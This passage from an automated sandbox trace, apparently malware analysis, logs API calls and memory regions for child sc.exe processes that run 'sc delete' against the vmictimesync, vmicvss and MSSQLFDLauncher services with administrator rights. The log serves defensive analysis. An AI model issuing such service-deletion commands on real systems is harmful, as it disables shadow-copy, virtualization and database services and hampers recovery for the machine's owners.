dwFlags=0x2900, lpSource=0x0, dwMessageId=0x64, dwLanguageId=0x0, lpBuffer=0x1e2fedfc60, nSize=0x2, Arguments=0x1e2fedfce0 | out: lpBuffer="쀰⿵\x1e") returned 0x1c [0067.427] GetFileType (hFile=0x24) returned 0x2 [0067.427] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x1e2fedfc10 | out: lpMode=0x1e2fedfc10) returned 1 [0067.494] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x1e2ff5c030*, nNumberOfCharsToWrite=0x1c, lpNumberOfCharsWritten=0x1e2fedfc08, lpReserved=0x0 | out: lpBuffer=0x1e2ff5c030*, lpNumberOfCharsWritten=0x1e2fedfc08*=0x1c) returned 1 [0067.494] LocalFree (hMem=0x1e2ff5c030) returned 0x0 [0067.494] LocalFree (hMem=0x0) returned 0x0 [0067.494] CloseServiceHandle (hSCObject=0x1e2ff58e00) returned 1 [0067.495] CloseServiceHandle (hSCObject=0x1e2ff58d70) returned 1 [0067.495] LocalFree (hMem=0x0) returned 0x0 [0067.495] exit (_Code=0) Thread: id = 264 os_tid = 0x1150 Process: id = "10" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0x4143e000" os_pid = "0xbd4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"vmictimesync\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 299 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 300 start_va = 0xcb45a60000 end_va = 0xcb45a7ffff entry_point = 0x0 region_type = private name = "private_0x000000cb45a60000" filename = "" Region: id = 301 start_va = 0xcb45a80000 end_va = 0xcb45a93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb45a80000" filename = "" Region: id = 302 start_va = 0xcb45aa0000 end_va = 0xcb45b1ffff entry_point = 0x0 region_type = private name = "private_0x000000cb45aa0000" filename = "" Region: id = 303 start_va = 0xcb45b20000 end_va = 0xcb45b23fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb45b20000" filename = "" Region: id = 304 start_va = 0xcb45b30000 end_va = 0xcb45b30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb45b30000" filename = "" Region: id = 305 start_va = 0xcb45b40000 end_va = 0xcb45b41fff entry_point = 0x0 region_type = private name = "private_0x000000cb45b40000" filename = "" Region: id = 306 start_va = 0x7df5ff8e0000 end_va = 0x7ff5ff8dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff8e0000" filename = "" Region: id = 307 start_va = 0x7ff67aca0000 end_va = 0x7ff67acc2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67aca0000" filename = "" Region: id = 308 start_va = 0x7ff67accb000 end_va = 0x7ff67accbfff entry_point = 0x0 region_type = private name = "private_0x00007ff67accb000" filename = "" Region: id = 309 start_va = 0x7ff67acce000 end_va = 0x7ff67accffff entry_point = 0x0 region_type = private name = "private_0x00007ff67acce000" filename = "" Region: id = 310 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 311 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 447 start_va = 0xcb45b70000 end_va = 0xcb45c6ffff entry_point = 0x0 region_type = private name = "private_0x000000cb45b70000" filename = "" Region: id = 448 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 449 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4042 start_va = 0xcb45a60000 end_va = 0xcb45a6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb45a60000" filename = "" Region: id = 4043 start_va = 0xcb45a70000 end_va = 0xcb45a76fff entry_point = 0x0 region_type = private name = "private_0x000000cb45a70000" filename = "" Region: id = 4044 start_va = 0xcb45c70000 end_va = 0xcb45d2dfff entry_point = 0xcb45c70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4045 start_va = 0xcb45d30000 end_va = 0xcb45daffff entry_point = 0x0 region_type = private name = "private_0x000000cb45d30000" filename = "" Region: id = 4046 start_va = 0xcb45f50000 end_va = 0xcb45f5ffff entry_point = 0x0 region_type = private name = "private_0x000000cb45f50000" filename = "" Region: id = 4047 start_va = 0x7ff67aba0000 end_va = 0x7ff67ac9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67aba0000" filename = "" Region: id = 4048 start_va = 0x7ff67accc000 end_va = 0x7ff67accdfff entry_point = 0x0 region_type = private name = "private_0x00007ff67accc000" filename = "" Region: id = 4049 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4050 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4115 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4116 start_va = 0xcb45b50000 end_va = 0xcb45b56fff entry_point = 0x0 region_type = private name = "private_0x000000cb45b50000" filename = "" Region: id = 4117 start_va = 0xcb45db0000 end_va = 0xcb45dc1fff entry_point = 0xcb45db0000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 11 os_tid = 0x770 [0068.301] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0068.301] __set_app_type (_Type=0x1) [0068.301] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0068.302] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0068.302] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.520] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0068.520] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0068.520] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0068.520] _wcsicmp (_String1="delete", _String2="query") returned -13 [0068.520] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0068.520] _wcsicmp (_String1="delete", _String2="start") returned -15 [0068.520] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0068.520] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0068.520] _wcsicmp (_String1="delete", _String2="control") returned 1 [0068.520] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0068.520] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0068.520] _wcsicmp (_String1="delete", _String2="config") returned 1 [0068.520] _wcsicmp (_String1="delete", _String2="description") returned -7 [0068.520] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0068.520] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0068.520] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0068.520] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0068.520] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0068.520] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0068.520] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0068.520] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0068.520] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0068.520] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0068.520] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0068.520] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0068.520] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0068.520] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0068.520] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0068.520] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0068.521] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0068.521] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0068.521] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0068.521] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0068.521] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0068.521] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0068.522] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xcb45b789e0 [0068.527] OpenServiceW (hSCManager=0xcb45b789e0, lpServiceName="vmictimesync", dwDesiredAccess=0x10000) returned 0xcb45b78bc0 [0068.527] DeleteService (hService=0xcb45b78bc0) returned 1 [0068.529] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x64, dwLanguageId=0x0, lpBuffer=0xcb45b1f8f0, nSize=0x2, Arguments=0xcb45b1f970 | out: lpBuffer="쁰䖷Ë") returned 0x1c [0068.531] GetFileType (hFile=0x24) returned 0x2 [0068.531] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xcb45b1f8a0 | out: lpMode=0xcb45b1f8a0) returned 1 [0068.619] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0xcb45b7c070*, nNumberOfCharsToWrite=0x1c, lpNumberOfCharsWritten=0xcb45b1f898, lpReserved=0x0 | out: lpBuffer=0xcb45b7c070*, lpNumberOfCharsWritten=0xcb45b1f898*=0x1c) returned 1 [0068.619] LocalFree (hMem=0xcb45b7c070) returned 0x0 [0068.619] LocalFree (hMem=0x0) returned 0x0 [0068.619] CloseServiceHandle (hSCObject=0xcb45b78bc0) returned 1 [0068.620] CloseServiceHandle (hSCObject=0xcb45b789e0) returned 1 [0068.704] LocalFree (hMem=0x0) returned 0x0 [0068.704] exit (_Code=0) Thread: id = 277 os_tid = 0x1184 Process: id = "11" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0x1343000" os_pid = "0x758" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"vmicvss\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 312 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 313 start_va = 0x49c5090000 end_va = 0x49c50affff entry_point = 0x0 region_type = private name = "private_0x00000049c5090000" filename = "" Region: id = 314 start_va = 0x49c50b0000 end_va = 0x49c50c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000049c50b0000" filename = "" Region: id = 315 start_va = 0x49c50d0000 end_va = 0x49c514ffff entry_point = 0x0 region_type = private name = "private_0x00000049c50d0000" filename = "" Region: id = 316 start_va = 0x49c5150000 end_va = 0x49c5153fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000049c5150000" filename = "" Region: id = 317 start_va = 0x49c5160000 end_va = 0x49c5160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000049c5160000" filename = "" Region: id = 318 start_va = 0x49c5170000 end_va = 0x49c5171fff entry_point = 0x0 region_type = private name = "private_0x00000049c5170000" filename = "" Region: id = 319 start_va = 0x7df5ff7c0000 end_va = 0x7ff5ff7bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff7c0000" filename = "" Region: id = 320 start_va = 0x7ff67acc0000 end_va = 0x7ff67ace2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67acc0000" filename = "" Region: id = 321 start_va = 0x7ff67ace8000 end_va = 0x7ff67ace8fff entry_point = 0x0 region_type = private name = "private_0x00007ff67ace8000" filename = "" Region: id = 322 start_va = 0x7ff67acee000 end_va = 0x7ff67aceffff entry_point = 0x0 region_type = private name = "private_0x00007ff67acee000" filename = "" Region: id = 323 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 324 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 450 start_va = 0x49c5320000 end_va = 0x49c541ffff entry_point = 0x0 region_type = private name = "private_0x00000049c5320000" filename = "" Region: id = 451 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 452 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3840 start_va = 0x49c5090000 end_va = 0x49c509ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000049c5090000" filename = "" Region: id = 3841 start_va = 0x49c50a0000 end_va = 0x49c50a6fff entry_point = 0x0 region_type = private name = "private_0x00000049c50a0000" filename = "" Region: id = 3842 start_va = 0x49c5180000 end_va = 0x49c523dfff entry_point = 0x49c5180000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3843 start_va = 0x49c5240000 end_va = 0x49c52bffff entry_point = 0x0 region_type = private name = "private_0x00000049c5240000" filename = "" Region: id = 3844 start_va = 0x49c5520000 end_va = 0x49c552ffff entry_point = 0x0 region_type = private name = "private_0x00000049c5520000" filename = "" Region: id = 3845 start_va = 0x7ff67abc0000 end_va = 0x7ff67acbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67abc0000" filename = "" Region: id = 3846 start_va = 0x7ff67acec000 end_va = 0x7ff67acedfff entry_point = 0x0 region_type = private name = "private_0x00007ff67acec000" filename = "" Region: id = 3847 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3848 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3869 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3870 start_va = 0x49c52c0000 end_va = 0x49c52c6fff entry_point = 0x0 region_type = private name = "private_0x00000049c52c0000" filename = "" Region: id = 3871 start_va = 0x49c52d0000 end_va = 0x49c52e1fff entry_point = 0x49c52d0000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 12 os_tid = 0x7c8 [0065.667] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0065.667] __set_app_type (_Type=0x1) [0065.667] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0065.667] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0065.667] SetThreadUILanguage (LangId=0x0) returned 0x409 [0065.924] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0065.924] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0065.924] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0065.924] _wcsicmp (_String1="delete", _String2="query") returned -13 [0065.924] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0065.924] _wcsicmp (_String1="delete", _String2="start") returned -15 [0065.924] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0065.924] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0065.924] _wcsicmp (_String1="delete", _String2="control") returned 1 [0065.924] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0065.924] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0065.924] _wcsicmp (_String1="delete", _String2="config") returned 1 [0065.924] _wcsicmp (_String1="delete", _String2="description") returned -7 [0065.924] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0065.924] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0065.924] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0065.924] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0065.924] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0065.924] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0065.924] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0065.924] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0065.924] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0065.924] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0065.924] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0065.924] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0065.924] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0065.924] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0065.924] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0065.924] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0065.924] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0065.924] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0065.924] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0065.924] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0065.924] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0065.924] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0065.926] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x49c5328b90 [0065.931] OpenServiceW (hSCManager=0x49c5328b90, lpServiceName="vmicvss", dwDesiredAccess=0x10000) returned 0x49c5328c80 [0065.932] DeleteService (hService=0x49c5328c80) returned 1 [0065.969] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x64, dwLanguageId=0x0, lpBuffer=0x49c514fba0, nSize=0x2, Arguments=0x49c514fc20 | out: lpBuffer="쀰씲I") returned 0x1c [0065.971] GetFileType (hFile=0x24) returned 0x2 [0065.971] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x49c514fb50 | out: lpMode=0x49c514fb50) returned 1 [0066.068] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x49c532c030*, nNumberOfCharsToWrite=0x1c, lpNumberOfCharsWritten=0x49c514fb48, lpReserved=0x0 | out: lpBuffer=0x49c532c030*, lpNumberOfCharsWritten=0x49c514fb48*=0x1c) returned 1 [0066.069] LocalFree (hMem=0x49c532c030) returned 0x0 [0066.069] LocalFree (hMem=0x0) returned 0x0 [0066.069] CloseServiceHandle (hSCObject=0x49c5328c80) returned 1 [0066.070] CloseServiceHandle (hSCObject=0x49c5328b90) returned 1 [0066.070] LocalFree (hMem=0x0) returned 0x0 [0066.070] exit (_Code=0) Thread: id = 251 os_tid = 0x10f0 Process: id = "12" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0x1348000" os_pid = "0xa34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"MSSQLFDLauncher\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 325 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 326 start_va = 0xb0b06f0000 end_va = 0xb0b070ffff entry_point = 0x0 region_type = private name = "private_0x000000b0b06f0000" filename = "" Region: id = 327 start_va = 0xb0b0710000 end_va = 0xb0b0723fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b0b0710000" filename = "" Region: id = 328 start_va = 0xb0b0730000 end_va = 0xb0b07affff entry_point = 0x0 region_type = private name = "private_0x000000b0b0730000" filename = "" Region: id = 329 start_va = 0xb0b07b0000 end_va = 0xb0b07b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b0b07b0000" filename = "" Region: id = 330 start_va = 0xb0b07c0000 end_va = 0xb0b07c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b0b07c0000" filename = "" Region: id = 331 start_va = 0xb0b07d0000 end_va = 0xb0b07d1fff entry_point = 0x0 region_type = private name = "private_0x000000b0b07d0000" filename = "" Region: id = 332 start_va = 0x7df5ffcb0000 end_va = 0x7ff5ffcaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffcb0000" filename = "" Region: id = 333 start_va = 0x7ff67a450000 end_va = 0x7ff67a472fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a450000" filename = "" Region: id = 334 start_va = 0x7ff67a478000 end_va = 0x7ff67a478fff entry_point = 0x0 region_type = private name = "private_0x00007ff67a478000" filename = "" Region: id = 335 start_va = 0x7ff67a47e000 end_va = 0x7ff67a47ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67a47e000" filename = "" Region: id = 336 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 337 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 453 start_va = 0xb0b08c0000 end_va = 0xb0b09bffff entry_point = 0x0 region_type = private name = "private_0x000000b0b08c0000" filename = "" Region: id = 454 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 455 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5197 start_va = 0xb0b06f0000 end_va = 0xb0b06fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b0b06f0000" filename = "" Region: id = 5198 start_va = 0xb0b0700000 end_va = 0xb0b0706fff entry_point = 0x0 region_type = private name = "private_0x000000b0b0700000" filename = "" Region: id = 5199 start_va = 0xb0b07e0000 end_va = 0xb0b089dfff entry_point = 0xb0b07e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5200 start_va = 0xb0b09c0000 end_va = 0xb0b0a3ffff entry_point = 0x0 region_type = private name = "private_0x000000b0b09c0000" filename = "" Region: id = 5201 start_va = 0xb0b0af0000 end_va = 0xb0b0afffff entry_point = 0x0 region_type = private name = "private_0x000000b0b0af0000" filename = "" Region: id = 5202 start_va = 0x7ff67a350000 end_va = 0x7ff67a44ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a350000" filename = "" Region: id = 5203 start_va = 0x7ff67a47c000 end_va = 0x7ff67a47dfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a47c000" filename = "" Region: id = 5204 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5205 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5206 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5207 start_va = 0xb0b08a0000 end_va = 0xb0b08a6fff entry_point = 0x0 region_type = private name = "private_0x000000b0b08a0000" filename = "" Region: id = 5208 start_va = 0xb0b0b00000 end_va = 0xb0b0bdefff entry_point = 0xb0b0b00000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5209 start_va = 0xb0b0a40000 end_va = 0xb0b0a51fff entry_point = 0xb0b0a40000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 13 os_tid = 0x278 [0077.405] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0077.405] __set_app_type (_Type=0x1) [0077.405] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0077.405] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0077.405] SetThreadUILanguage (LangId=0x0) returned 0x409 [0077.442] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, 